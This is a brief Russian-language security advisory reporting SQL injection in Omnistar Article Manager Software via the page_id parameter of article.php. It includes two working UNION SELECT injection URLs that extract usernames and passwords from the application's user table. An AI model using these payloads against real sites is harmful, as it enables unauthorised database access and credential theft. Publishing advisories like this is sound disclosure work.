Программа: Omnistar Article Manager Software

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием article.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Пример:

/article.php?op=favorite&article_id=4&page_id=-1’/**/union/**/select/**/name,1/**/from/**/user/*

/article.php?op=favorite&article_id=4&page_id=-1’/**/union/**/select/**/password,1/**/from/**/user/*



Оставить мнение